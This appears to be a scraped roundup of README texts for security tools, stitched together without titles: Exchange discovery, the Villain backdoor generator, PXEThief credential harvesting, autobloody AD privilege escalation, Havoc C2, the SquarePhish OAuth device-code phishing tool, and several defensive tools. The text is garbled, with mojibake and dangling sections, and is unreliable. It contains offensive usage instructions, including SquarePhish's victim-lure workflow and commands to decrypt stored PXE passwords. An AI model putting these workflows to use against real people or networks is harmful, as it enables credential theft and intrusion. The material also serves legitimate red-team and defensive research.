ExchangeFinder is a simple and open-source tool that tries to find Micrsoft Exchange instance for a given domain based on the top common DNS names for Microsoft Exchange.
ExchangeFinder can identify the exact version of Microsoft Exchange starting from Microsoft Exchange 4.0
to Microsoft Exchange Server 2019
.
ExchangeFinder will first try to resolve any subdomain that is commonly used for Exchange server, then it will send a couple of HTTP requests to parse the content of the response sent by the server to identify if it's using Microsoft Exchange or not.
Currently, the tool has a signature of every version from Microsoft Exchange starting from Microsoft Exchange 4.0
to Microsoft Exchange Server 2019
, and based on the build version sent by Exchange via the header X-OWA-Version
we can identify the exact version.
If the tool found a valid Microsoft Exchange instance, it will return the following results:
Clone the latest version of ExchangeFinder
using the following command:
git clone https://github.com/mhaskar/ExchangeFinder
And then install all the requirements using the command poetry install
.
โโโ(kaliใฟkali)-[~/Desktop/ExchangeFinder]
โโ$ poetry install 1 โจฏ
Installing dependencies from lock file
Package operations: 15 installs, 0 updates, 0 removals
โข Installing pyparsing (3.0.9)
โข Installing attrs (22.1.0)
โข Installing certifi (2022.6.15)
โข Installing charset-normalizer (2.1.1)
โข Installing idna (3.3)
โข Installing more-itertools (8.14.0)
โข Installing packaging (21.3)
โข Installing pluggy (0.13.1)
โข Installing py (1.11.0)
โข Installing urllib3 (1.26.12)
โข Installing wcwidth (0.2.5)
โข Installing dnspython (2.2.1)
โข Installing pytest (5.4.3)
โข Installing requests (2.28.1)
โข Installing termcolor (1.1.0)< br/>
Installing the current project: ExchangeFinder (0.1.0)
โโโ(kaliใฟkali)-[~/Desktop/ExchangeFinder]
โโโ(kaliใฟkali)-[~/Desktop/ExchangeFinder]
โโ$ python3 exchangefinder.py
______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/
Find that Microsoft Exchange server ..
[-] Please use --domain or --domains option
โโโ(kali 27;kali)-[~/Desktop/ExchangeFinder]
โโ$
You can use the option -h
to show the help banner:
To scan single domain you can use the option --domain
like the following:
askarโข/opt/redteaming/ExchangeFinder(mainโก)ยป python3 exchangefinder.py --domain dummyexchangetarget.com
______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/
Find that Microsoft Exchange server ..
[!] Scanning domain dummyexch angetarget.com
[+] The following MX records found for the main domain
10 mx01.dummyexchangetarget.com.
[!] Scanning host (mail.dummyexchangetarget.com)
[+] IIS server detected (https://mail.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:
Domain Found : https://mail.dummyexchangetarget.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0
[!] Scanning host (autodiscover.dummyexchangetarget.com)
[+] IIS server detected (https://autodiscover.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:
Domain Found : https://autodiscover.dummyexchangetarget.com Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://autodiscover.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fautodiscover.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0
askarโข/opt/redteaming/ExchangeFinder(mainโก)ยป
To scan multiple domains (targets) you can use the option --domains
and choose a file like the following:
askarโข/opt/redteaming/ExchangeFinder(mainโก)ยป python3 exchangefinder.py --domains domains.txt
______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/
Find that Microsoft Exchange server ..
[+] Total domains to scan are 2 domains
[!] Scanning domain externalcompany.com
[+] The following MX records f ound for the main domain
20 mx4.linfosyshosting.nl.
10 mx3.linfosyshosting.nl.
[!] Scanning host (mail.externalcompany.com)
[+] IIS server detected (https://mail.externalcompany.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:
Domain Found : https://mail.externalcompany.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.externalcompany.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.externalcompany.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0
[!] Scanning domain o365.cloud
[+] The following MX records found for the main domain
10 mailstore1.secureserver.net.
0 smtp.secureserver.net.
[!] Scanning host (mail.o365.cloud)
[+] IIS server detected (https://mail.o365.cloud)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:
Domain Found : https://mail.o365.cloud
Exchange version : Exchange Server 2013 CU23 May22SU
Login page : https://mail.o365.cloud/owa/auth/logon.aspx?url=https%3a%2f%2fmail.o365.cloud%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/8.5
askarโข/opt/redteaming/ExchangeFinder(mainโก)ยป
Please note that the examples used in the screenshots are resolved in the lab only
This tool is very simple and I was using it to save some time while searching for Microsoft Exchange instances, feel free to open PR if you find any issue or you have a new thing to add.
This project is licensed under the GPL-3.0 License - see the LICENSE file for details
Villain is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team.
The main idea behind the payloads generated by this tool is inherited from HoaxShell. One could say that Villain is an evolved, steroid-induced version of it.
[2022-11-30] Recent & awesome, made by John Hammond -> youtube.com/watch?v=pTUggbSCqA0
[2022-11-14] Original release demo, made by me -> youtube.com/watch?v=NqZEmBsLCvQ
Disclaimer: Running the payloads generated by this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.
git clone https://github.com/t3l3machus/Villain
cd ./Villain
pip3 install -r requirements.txt
You should run as root:
Villain.py [-h] [-p PORT] [-x HOAX_PORT] [-c CERTFILE] [-k KEYFILE] [-u] [-q]
For more information about using Villain check out the Usage Guide.
A few notes about the http(s) beacon-like reverse shell approach:
Pull requests are generally welcome. Please, keep in mind: I am constantly working on new offsec tools as well as maintaining several existing ones. I rarely accept pull requests because I either have a plan for the course of a project or I evaluate that it would be hard to test and/or maintain the foreign code. It doesn't have to do with how good or bad is an idea, it's just too much work and also, I am kind of developing all these tools to learn myself.
There are parts of this project that were removed before publishing because I considered them to be buggy or hard to maintain (at this early stage). If you have an idea for an addition that comes with a significant chunk of code, I suggest you first contact me to discuss if there's something similar already in the making, before making a PR.
PXEThief is a set of tooling that implements attack paths discussed at the DEF CON 30 talk Pulling Passwords out of Configuration Manager (https://forum.defcon.org/node/241925) against the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager (or ConfigMgr, still commonly known as SCCM). It allows for credential gathering from configured Network Access Accounts (https://docs.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts#network-access-account) and any Task Sequence Accounts or credentials stored within ConfigMgr Collectio n Variables that have been configured for the "All Unknown Computers" collection. These Active Directory accounts are commonly over permissioned and allow for privilege escalation to administrative access somewhere in the domain, at least in my personal experience.
Likely, the most serious attack that can be executed with this tooling would involve PXE-initiated deployment being supported for "All unknown computers" on a distribution point without a password, or with a weak password. The overpermissioning of ConfigMgr accounts exposed to OSD mentioned earlier can then allow for a full Active Directory attack chain to be executed with only network access to the target environment.
python pxethief.py -h
pxethief.py 1 - Automatically identify and download encrypted media file using DHCP PXE boot request. Additionally, attempt exploitation of blank media password when auto_exploit_blank_password is set to 1 in 'settings.ini'
pxethief.py 2 <IP Address of DP Server> - Coerce PXE Boot against a specific MECM Distribution Point server designated by IP address
pxethief.py 3 <variables-file-name> <Password-guess> - Attempt to decrypt a saved media variables file (obtained from PXE, bootable or prestaged media) and retrieve sensitive data from MECM DP
pxethief.py 4 <variables-file-name> <policy-file-path> <password> - Attempt to decrypt a saved media variables file and Policy XML file retrieved from a stand-alone TS media
pxethief.py 5 <variables-file-name> - Print the hash corresponding to a specified media variables file for cracking in Hashcat
pxethief.py 6 <identityguid> <identitycert-file-name> - Retrieve task sequences using the values obtained from registry keys on a DP
pxethief.py 7 <Reserved1-value> - Decrypt stored PXE password from SCCM DP registry key (reg query HKLM\software\microsoft\sms\dp /v Reserved1)
pxethief.py 8 - Write new default 'settings.ini' file in PXEThief directory
pxethief.py 10 - Print Scapy interface table to identify interface indexes for use in 'settings.ini'
pxethief.py -h - Print PXEThief help text
pxethief.py 5 <variables-file-name>
should be used to generate a 'hash' of a media variables file that can be used for password guessing attacks with the Hashcat module published at https://github.com/MWR-CyberSec/configmgr-cryptderivekey-hashcat-module.
A file contained in the main PXEThief folder is used to set more static configuration options. These are as follows:
[SCAPY SETTINGS]
automatic_interface_selection_mode = 1
manual_interface_selection_by_id =
[HTTP CONNECTION SETTINGS]
use_proxy = 0
use_tls = 0
[GENERAL SETTINGS]
sccm_base_url =
auto_exploit_blank_password = 1
automatic_interface_selection_mode
will attempt to determine the best interface for Scapy to use automatically, for convenience. It does this using two main techniques. If set to 1
it will attempt to use the interface that can reach the machine's default GW as output interface. If set to 2
, it will look for the first interface that it finds that has an IP address that is not an autoconfigure or localhost IP address. This will fail to select the appropriate interface in some scenarios, which is why you can force the use of a specific inteface with 'manual_interface_selection_by_id'.manual_interface_selection_by_id
allows you to specify the integer index of the interface you want Scapy to use. The ID to use in this file should be obtained from running pxethief.py 10
.sccm_base_url
is useful for overriding the Management Point that the tooling will speak to. This is useful if DNS does not resolve (so the value read from the media variables file cannot be used) or if you have identified multiple Management Points and want to send your traffic to a specific one. This should be provided in the form of a base URL e.g. http://mp.configmgr.com
instead of mp.configmgr.com
or http://mp.configmgr.com/stuff
.auto_exploit_blank_password
changes the behaviour of pxethief 1
to automatically attempt to exploit a non-password protected PXE Distribution Point. Setting this to 1
will enable auto exploitation, while setting it to 0
will print the tftp client string you should use to download the media variables file. Note that almost all of the time you will want this set to 1
, since non-password protected PXE makes use of a binary key that is sent in the DHCP response that you receive when you ask the Distribution Point to perform a PXE boot.Not implemented in this release
pip install -r requirements.txt
)pxethief.py 1
or pxethief.py 2
to identify and generate a media variables file, make sure the interface used by the tool is set to the correct one, if it is not correct, manually set it in 'settings.ini' by identifying the right index ID to use from pxethief.py 10
pxethief.py
and the address of the proxy can be set on line 693. I am planning to move this feature to be configurable in 'settings.ini' in the next update to the code basepywin32
in order to utilise some built-in Windows cryptography functions. This is not available on Linux, since the Windows cryptography APIs are not available on Linux :P The Scapy code in pxethief.py
, however, is fully functional on Linux, but you will need to patch out (at least) the include of win32crypt
to get it to run under LinuxExpect to run into issues with error handling with this tool; there are subtle nuances with everything in ConfigMgr and while I have improved the error handling substantially in preparation for the tool's release, this is in no way complete. If there are edge cases that fail, make a detailed issue or fix it and make a pull request :) I'll review these to see where reasonable improvements can be made. Read the code/watch the talk and understand what is going on if you are going to run it in a production environment. Keep in mind the licensing terms - i.e. use of the tool is at your own risk.
Identifying and retrieving credentials from SCCM/MECM Task Sequences - In this post, I explain the entire flow of how ConfigMgr policies are found, downloaded and decrypted after a valid OSD certificate is obtained. I also want to highlight the first two references in this post as they show very interesting offensive SCCM research that is ongoing at the moment.
DEF CON 30 Slides - Link to the talk slides
Copyright (C) 2022 Christopher Panayi, MWR CyberSec
Subparse, is a modular framework developed by Josh Strochein, Aaron Baker, and Odin Bernstein. The framework is designed to parse and index malware files and present the information found during the parsing in a searchable web-viewer. The framework is modular, making use of a core parsing engine, parsing modules, and a variety of enrichers that add additional information to the malware indices. The main input values for the framework are directories of malware files, which the core parsing engine or a user-specified parsing engine parses before adding additional information from any user-specified enrichment engine all before indexing the information parsed into an elasticsearch index. The information gathered can then be searched and viewed via a web-viewer, which also allows for filtering on any value gathered from any file. There are currently 3 parsing engine, the default parsing modules (ELFParser, OLEParser and PEParser), and 4 enrichment modules (ABUSEEnricher, C APEEnricher, STRINGEnricher and YARAEnricher).
ย
To get started using Subparse there are a few requrired/recommened programs that need to be installed and setup before trying to work with our software.
Software | Status | Link |
---|---|---|
Docker | Required | Installation Guide |
Python3.8.1 | Required | Installation Guide |
Pyenv | Recommended | Installation Guide |
After getting the required/recommended software installed to your system there are a few other steps that need to be taken to get Subparse installed.
sudo get apt install build-essential
pip3 install -r ./requirements.txt
docker-compose up
Note: This might take a little time due to downloading the images and setting up the containers that will be needed by Subparse.
ย
Command line options that are available for subparse/parser/subparse.py:
Argument | Alternative | Required | Description |
---|---|---|---|
-h | --help | No | Shows help menu |
-d SAMPLES_DIR | --directory SAMPLES_DIR | Yes | Directory of samples to parse |
-e ENRICHER_MODULES | --enrichers ENRICHER_MODULES | No | Enricher modules to use for additional parsing |
-r | --reset | No | Reset/delete all data in the configured Elasticsearch cluster |
-v | --verbose | No | Display verbose commandline output |
-s | --service-mode | No | Enters service mode allowing for mode samples to be added to the SAMPLES_DIR while processing |
To view the results from Subparse's parsers, navigate to localhost:8080. If you are having trouble viewing the site, make sure that you have the container started up in Docker and that there is not another process running on port 8080 that could cause the site to not be available.
ย
Before any parser is executed general information is collected about the sample regardless of the underlying file type. This information includes:
Parsers are ONLY executed on samples that match the file type. For example, PE files will by default have the PEParser executed against them due to the file type corresponding with those the PEParser is able to examine.
ย
These modules are optional modules that will ONLY get executed if specified via the -e | --enrichers flag on the command line.
ย
Subparse's web view was built using Bootstrap for its CSS, this allows for any built in Bootstrap CSS to be used when developing your own custom Parser/Enricher Vue.js files. We have also provided an example for each to help get started and have also implemented a few custom widgets to ease the process of development and to promote standardization in the way information is being displayed. All Vue.js files are used for dynamically displaying information from the custom Parser/Enricher and are used as templates for the data.
Note: Naming conventions with both class and file names must be strictly adheared to, this is the first thing that should be checked if you run into issues now getting your custom Parser/Enricher to be executed. The naming convention of your Parser/Enricher must use the same name across all of the files and class names.
The logger object is a singleton implementation of the default Python logger. For indepth usage please reference the Offical Doc. For Subparse the only logging methods that we recommend using are the logging levels for output. These are:
A Python3
terminal application that contains 260+ Neo4j
cyphers for BloodHound data sets.
BloodHound
is a staple tool for every red teamer. However, there are some negative side effects based on its design. I will cover the biggest pain points I've experienced and what this tool aims to address:
JSON
graphs, I need graph results in a line-by-line format .txt
fileThis tool can also help blue teams to reveal detailed information about their Active Directory environments as well.
Take back control of your BloodHound
data with cypherhound
!
grep/cut/awk
-friendly formatMake sure to have python3
installed and run:
python3 -m pip install -r requirements.txt
Start the program with: python3 cypherhound.py -u <neo4j_username> -p <neo4j_password>
The full command menu is shown below:
Command Menu
set - used to set search parameters for cyphers, double/single quotes not required for any sub-commands
sub-commands
user - the user to use in user-specific cyphers (MUST include @domain.name)
group - the group to use in group-specific cyphers (MUST include @domain.name)
computer - the computer to use in computer-specific cyphers (SHOULD include .domain.name or @domain.name)
regex - the regex to use in regex-specific cyphers
example
set user svc-test@domain.local
set group domain admins@domain.local
set computer dc01.domain.local
set regex .*((?i)web).*
run - used to run cyphers
parameters
cypher number - the number of the cypher to run
example
run 7
export - used to export cypher results to txt files
parameters
cypher number - the number of the cypher to run and then export
output filename - the number of the output file, extension not needed
raw - write raw output or just end object (optional)
example
export 31 results
export 42 results2 raw
list - used to show a list of cyphers
parameters
list type - the type of cyphers to list (general, user, group, computer, regex, all)
example
list general
list user
list group
list computer
list regex
list all
q, quit, exit - used to exit the program
clear - used to clear the terminal
help, ? - used to display this help menu
Neo4j
database and URI
BloodHound 4.2.0
, certain edges will not work for previous versionsWindows
users must run pip3 install pyreadline3
raw
or not) due to their unpredictable number of nodesAzure
edgesPlease be descriptive with any issues you decide to open and if possible provide output (if applicable).
Aftermath is a Swift-based, open-source incident response framework.
Aftermath can be leveraged by defenders in order to collect and subsequently analyze the data from the compromised host. Aftermath can be deployed from an MDM (ideally), but it can also run independently from the infected user's command line.
Aftermath first runs a series of modules for collection. The output of this will either be written to the location of your choice, via the -o
or --output
option, or by default, it is written to the /tmp
directory.
Once collection is complete, the final zip/archive file can be pulled from the end user's disk. This file can then be analyzed using the --analyze
argument pointed at the archive file. The results of this will be written to the /tmp
directory. The administrator can then unzip that analysis directory and see a parsed view of the locally collected databases, a timeline of files with the file creation, last accessed, and last modified dates (if they're available), and a storyline which includes the file metadata, database changes, and browser information to potentially track down the infection vector.
To build Aftermath locally, clone it from the repository
git clone https://github.com/jamf/aftermath.git
cd
into the Aftermath directory
cd <path_to_aftermath_directory>
Build using Xcode
xcodebuild
cd
into the Release folder
cd build/Release
Run aftermath
sudo ./aftermath
Aftermath needs to be root, as well as have full disk access (FDA) in order to run. FDA can be granted to the Terminal application in which it is running.
The default usage of Aftermath runs
sudo ./aftermath
To specify certain options
sudo ./aftermath [option1] [option2]
Examples
sudo ./aftermath -o /Users/user/Desktop --deep
sudo ./aftermath --analyze <path_to_collection_zip>
There is an Aftermath.pkg available under Releases. This pkg is signed and notarized. It will install the aftermath binary at /usr/local/bin/
. This would be the ideal way to deploy via MDM. Since this is installed in bin
, you can then run aftermath like
sudo aftermath [option1] [option2]
To uninstall the aftermath binary, run the AftermathUninstaller.pkg
from the Releases. This will uninstall the binary and also run aftermath --cleanup
to remove aftermath directories. If any aftermath directories reside elsewhere, from using the --output
command, it is the responsibility of the user/admin to remove said directories.
Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.
Havoc is in an early state of release. Breaking changes may be made to APIs/core structures as the framework matures.
ย
Consider supporting C5pider on Patreon/Github Sponsors. Additional features are planned for supporters in the future, such as custom agents/plugins/commands/etc.
Please see the Wiki for complete documentation.
Havoc works well on Debian 10/11, Ubuntu 20.04/22.04 and Kali Linux. It's recommended to use the latest versions possible to avoid issues. You'll need a modern version of Qt and Python 3.10.x to avoid build issues.
See the Installation guide in the Wiki for instructions. If you run into issues, check the Known Issues page as well as the open/closed Issues list.
Cross-platform UI written in C++ and Qt
Written in Golang
Havoc's flagship agent written in C and ASM
You can join the official Havoc Discord to chat with the community!
To contribute to the Havoc Framework, please review the guidelines in Contributing.md and then open a pull-request!
OFRAK (Open Firmware Reverse Analysis Konsole) is a binary analysis and modification platform. OFRAK combines the ability to:
OFRAK supports a range of embedded firmware file formats beyond userspace executables, including:
OFRAK equips users with:
See ofrak.com for more details.
The web-based GUI view provides a navigable resource tree. For the selected resource, it also provides: metadata, hex or text navigation, and a mini map sidebar for quickly navigating by entropy, byteclass, or magnitude. The GUI also allows for actions normally available through the Python API like commenting, unpacking, analyzing, modifying and packing resources.
OFRAK uses Git LFS. This means that you must have Git LFS installed before you clone the repository! Install Git LFS by following the instructions here. If you accidentally cloned the repository before installing Git LFS, cd
into the repository and run git lfs pull
.
See docs/environment-setup
for detailed instructions on how to install OFRAK.
OFRAK has general documentation and API documentation. Both can be viewed at ofrak.com/docs.
If you wish to make changes to the documentation or serve it yourself, follow the directions in docs/README.md
.
The code in this repository comes with an OFRAK Community License, which is intended for educational uses, personal development, or just having fun.
Users interested in OFRAK for commercial purposes can request the Pro License, which for a limited period is available for a free 6-month trial. See OFRAK Licensing for more information.
Red Balloon Security is excited for security researchers and developers to contribute to this repository.
For details, please see our contributor guide and the Python development guide.
Please contact ofrak@redballoonsecurity.com, or write to us on the OFRAK Slack with any questions or issues regarding OFRAK. We look forward to getting your feedback! Sign up for the OFRAK Mailing List to receive monthly updates about OFRAK code improvements and new features.
This material is based in part upon work supported by the DARPA under Contract No. N66001-20-C-4032. Any opinions, findings and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the DARPA. Distribution Statement โAโ (Approved for Public Release, Distribution Unlimited).
autobloody
is a tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound.
This tool automates the AD privesc between two AD objects, the source (the one we own) and the target (the one we want) if a privesc path exists in BloodHound database. The automation is composed of two steps:
bloodyAD
packageBecause autobloody relies on bloodyAD, it supports authentication using cleartext passwords, pass-the-hash, pass-the-ticket or certificates and binds to LDAP services of a domain controller to perform AD privesc.
First if you run it on Linux, you must have libkrb5-dev
installed on your OS in order for kerberos to work:
# Debian/Ubuntu/Kali
apt-get install libkrb5-dev
# Centos/RHEL
yum install krb5-devel
# Fedora
dnf install krb5-devel
# Arch Linux
pacman -S krb5
A python package is available:
pip install autobloody
Or you can clone the repo:
git clone --depth 1 https://github.com/CravateRouge/autobloody
pip install .
First data must be imported into BloodHound (e.g using SharpHound or BloodHound.py) and Neo4j must be running.
โ ๏ธ-ds and -dt values are case sensitive
Simple usage:
autobloody -u john.doe -p 'Password123!' --host 192.168.10.2 -dp 'neo4jP@ss' -ds 'JOHN.DOE@BLOODY.LOCAL' -dt 'BLOODY.LOCAL'
Full help:
[bloodyAD]$ ./autobloody.py -h
usage: autobloody.py [-h] [--dburi DBURI] [-du DBUSER] -dp DBPASSWORD -ds DBSOURCE -dt DBTARGET [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] --host HOST
AD Privesc Automation
options:
-h, --help show this help message and exit
--dburi DBURI The host neo4j is running on (default is "bolt://localhost:7687")
-du DBUSER, --dbuser DBUSER
Neo4j username to use (default is "neo4j")
-dp DBPASSWORD, --dbpassword DBPASSWORD
Neo4j password to use
-ds DBSOURCE, --dbsource DBSOURCE
Case sensitive label of the source node (name property in bloodhound)
-dt DBTARGET, --dbtarget DBTARGET
Case sensitive label of the target node (name property in bloodhound)
-d DOMAIN, --domain DOMAIN
Domain used for NTLM authentication
-u USERNAME, --username USERNAME
Username used for NTLM authentication
-p PASSWORD, --password PASSWORD
Cleartext password or LMHASH:NTHASH for NTLM authentication
-k, --kerberos
-c CERTIFICATE, --certificate CERTIFICATE
Certificate authentication, e.g: "path/to/key:path/to/cert"
-s, --secure Try to use LDAP over TLS aka LDAPS (default is LDAP)
--host HOST Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)
First a privesc path is found using the Dijkstra's algorithm implemented into the Neo4j's GDS library. The Dijkstra's algorithm allows to solve the shortest path problem on a weighted graph. By default the edges created by BloodHound don't have weight but a type (e.g MemberOf, WriteOwner). A weight is then added to each edge accordingly to the type of edge and the type of node reached (e.g user,group,domain).
Once a path is generated, autobloody
will connect to the DC and execute the path and clean what is reversible (everything except ForcePasswordChange
and setOwner
).
For now, only the following BloodHound edges are currently supported for automatic exploitation:
S3cret Scanner
tool designed to provide a complementary layer for the Amazon S3 Security Best Practices by proactively hunting secrets in public S3 buckets.scheduled task
or On-Demand
The automation will perform the following actions:
Public
or objects can be public
).p12
, .pgp
and more)logger.log
file.{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"s3:GetLifecycleConfiguration",
"s3:GetBucketTagging",
"s3:ListBucket",
"s3:GetAccelerateConfiguration",
"s3:GetBucketPolicy",
"s3:GetBucketPublicAccessBlock",
"s3:GetBucketPolicyStatus",
"s3:GetBucketAcl",
"s3:GetBucketLocation"
],
"Resource": "arn:aws:s3:::*"
},
{
"Sid": "VisualEditor1",
"Effect": "Allow",
"Action": "s3:ListAllMyBuckets",
"Resource": "*"
}
]
}
accounts.csv
in the csv
directory, in the following format:Account name,Account id
prod,123456789
ci,321654987
dev,148739578
Use pip to install the needed requirements.
# Clone the repo
git clone <repo>
# Install requirements
pip3 install -r requirements.txt
# Install trufflehog3
pip3 install trufflehog3
Argument | Values | Description | Required |
---|---|---|---|
-p, --aws_profile | The aws profile name for the access keys | โ | |
-r, --scanner_role | The aws scanner's role name | โ | |
-m, --method | internal | the scan type | โ |
-l, --last_modified | 1-365 | Number of days to scan since the file was last modified; Default - 1 | โ |
python3 main.py -p secTeam -r secteam-inspect-s3-buckets -l 1
Pull requests and forks are welcome. For major changes, please open an issue first to discuss what you would like to change.
A project created with an aim to emulate and test exfiltration of data over different network protocols. The emulation is performed w/o the usage of native API's. This will help blue teams write correlation rules to detect any type of C2 communication or data exfiltration.
Currently, this project can help generate HTTP/HTTPS traffic (both GET and POST) using the below metioned progamming/scripting languages:
Download the latest ZIP from realease.
With SSl: python3 HTTP-S-EXFIL.py ssl
Without SSL: python3 HTTP-S-EXFIL.py
CNet.exe <Server-IP-ADDRESS>
- Select any optionChashNet.exe <Server-IP-ADDRESS>
- Select any option.\PowerHttp.ps1 -ip <Server-IP-ADDRESS> -port <80/443> -method <GET/POST>
SquarePhish is an advanced phishing tool that uses a technique combining the OAuth Device code authentication flow and QR codes.
See PhishInSuits for more details on using OAuth Device Code flow for phishing attacks.
_____ _____ _ _ _
/ ____| | __ \| | (_) | |
| (___ __ _ _ _ __ _ _ __ ___| |__) | |__ _ ___| |__
\___ \ / _` | | | |/ _` | '__/ _ \ ___/| '_ \| / __| '_ \
____) | (_| | |_| | (_| | | | __/ | | | | | \__ \ | | |
|_____/ \__, |\__,_|\__,_|_| \___|_| |_| |_|_|___/_| |_|
| |
|_|
_________
| | /(
| O |/ (
|> |\ ( v0.1.0
|_________| \(
usage: squish.py [-h] {email,server} ...
SquarePhish -- v0.1.0
optional arguments:
-h, --help show this help message and exit
modules:
{email,server}
email send a malicious QR Code ema il to a provided victim
server host a malicious server QR Codes generated via the 'email' module will
point to that will activate the malicious OAuth Device Code flow
An attacker can use the email
module of SquarePhish to send a malicious QR code email to a victim. The default pretext is that the victim is required to update their Microsoft MFA authentication to continue using mobile email. The current client ID in use is the Microsoft Authenticator App.
By sending a QR code first, the attacker can avoid prematurely starting the OAuth Device Code flow that lasts only 15 minutes.
The victim will then scan the QR code found in the email body with their mobile device. The QR code will direct the victim to the attacker controlled server (running the server
module of SquarePhish), with a URL paramater set to their email address.
When the victim visits the malicious SquarePhish server, a background process is triggered that will start the OAuth Device Code authentication flow and email the victim a generated Device Code they are then required to enter into the legitimate Microsoft Device Code website (this will start the OAuth Device Code flow 15 minute timer).
The SquarePhish server will then continue to poll for authentication in the background.
[2022-04-08 14:31:51,962] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:31:57,185] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:02,372] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:07,516] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:12,847] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:17,993] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:23,169] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:28,492] [info] [minnow@square.phish] Polling for user authentication...
The victim will then visit the Microsoft Device Code authentication site from either the link provided in the email or via a redirect from visiting the SquarePhish URL on their mobile device.
The victim will then enter the provided Device Code and will be prompted for consent.
After the victim authenticates and consents, an authentication token is saved locally and will provide the attacker access via the defined scope of the requesting application.
[2022-04-08 14:32:28,796] [info] [minnow@square.phish] Token info saved to minnow@square.phish.tokeninfo.json
The current scope definition:
"scope": ".default offline_access profile openid"
!IMPORTANT: Before using either module, update the required information in the settings.config file noted with
Required
.
Send the target victim a generated QR code that will trigger the OAuth Device Code flow.
usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]
--debug enable server debugging
-e EMAIL, --email EMAIL
victim email address to send initial QR code email to
Host a server that a generated QR code will be pointed to and when requested will trigger the OAuth Device Code flow.
usage: squish.py server [-h] [-c CONFIG] [--debug]
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]
--debug enable server debugging
All of the applicable settings for execution can be found and modified via the settings.config file. There are several pieces of required information that do not have a default value that must be filled out by the user: SMTP_EMAIL, SMTP_PASSWORD, and SQUAREPHISH_SERVER (only when executing the email module). All configuration options have been documented within the settings file via in-line comments.
Note: The SQUAREPHISH_
values present in the 'EMAIL' section of the configuration should match the values set when running the SquarePhish server.
Currently, the pre-defined pretexts can be found in the pretexts folder.
To write custom pretexts, use the existing template via the pretexts/iphone/ folder. An email template is required for both the initial QR code email as well as the follow up device code email.
Important: When writing a custom pretext, note the existence of %s
in both pretext templates. This exists to allow SquarePhish to populate the correct data when generating emails (QR code data and/or device code value).
There are several HTTP response headers defined in the utils.py file. These headers are defined to override any existing Flask response header values and to provide a more 'legitimate' response from the server. These header values can be modified, removed and/or additional headers can be included for better OPSEC.
{
"vary": "Accept-Encoding",
"server": "Microsoft-IIS/10.0",
"tls_version": "tls1.3",
"content-type": "text/html; charset=utf-8",
"x-appversion": "1.0.8125.42964",
"x-frame-options": "SAMEORIGIN",
"x-ua-compatible": "IE=Edge;chrome=1",
"x-xss-protection": "1; mode=block",
"x-content-type-options": "nosniff",
"strict-transport-security": "max-age=31536000",
}
An automated tool which can simultaneously crawl, fill forms, trigger error/debug pages and "loot" secrets out of the client-facing code of sites.
To use the tool, you can grab any one of the pre-built binaries from the Releases section of the repository. If you want to build the source code yourself, you will need Go > 1.16 to build it. Simply running go build
will output a usable binary for you.
Additionally you will need two json files (lootdb.json and regexes.json) alongwith the binary which you can get from the repo itself. Once you have all 3 files in the same folder, you can go ahead and fire up the tool.
Video demo:
Here is the help usage of the tool:
